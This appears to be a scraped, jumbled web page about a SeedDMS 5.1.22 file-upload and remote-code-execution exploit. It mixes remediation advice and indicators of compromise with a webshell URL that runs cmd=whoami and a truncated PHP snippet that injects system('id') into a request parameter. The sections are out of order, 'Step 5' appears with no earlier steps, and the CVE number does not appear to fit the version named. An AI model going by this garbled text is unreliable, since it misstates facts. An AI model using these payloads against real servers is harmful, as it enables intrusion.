SeedDMS 5.1.22 - Exploit
One of the most notable reports regarding SeedDMS 5.1.22 involves a comprehensive penetration test that chain-exploited multiple vulnerabilities to achieve full system takeover.
Access the file via your browser or curl: http://[target]/seeddms/data/1048576/24/1.php?cmd=whoami
Remediation and Fixes
Indicators of compromise
- Unexpected files in web directories with double extensions (e.g., .php.jpg, .php.txt) or with traversal sequences.
- New user accounts or documents with odd metadata values.
- Web server logs showing POSTs to upload endpoints with multipart boundaries and unusual filename fields.
- Server-side error logs referencing file move/rename failures or permission changes.
Vulnerability Type: Unrestricted File Upload / Remote Code Execution (RCE)
CVE Reference: CVE-2019-12744
Affected Version: SeedDMS 5.1.22 and earlier
If you're studying this version for a legitimate security test (e.g., CTF, audit, or research), I recommend:
Step 5: Gaining Code Execution
Once the shell's URL is confirmed:
- Update to the latest version: SeedDMS 6.0.3 or later, which includes patches for this vulnerability.
- Restrict file uploads: Limit file uploads to trusted users and validate file types.
- Implement a Web Application Firewall (WAF): A WAF can help detect and block suspicious traffic.
- Monitor your system: Regularly check your system's logs and performance for signs of malicious activity.
<?php
$url = 'http://<target_host>/seeddms/out.php';
$data = array(
'folder' => 'system(\'id\')',
'id' => '1'
);
Part 1: The Vulnerability – Anatomy of the Flaw
The Core Issue: addfile.php & Improper Session Enforcement
In properly secured versions of SeedDMS, uploading a document requires: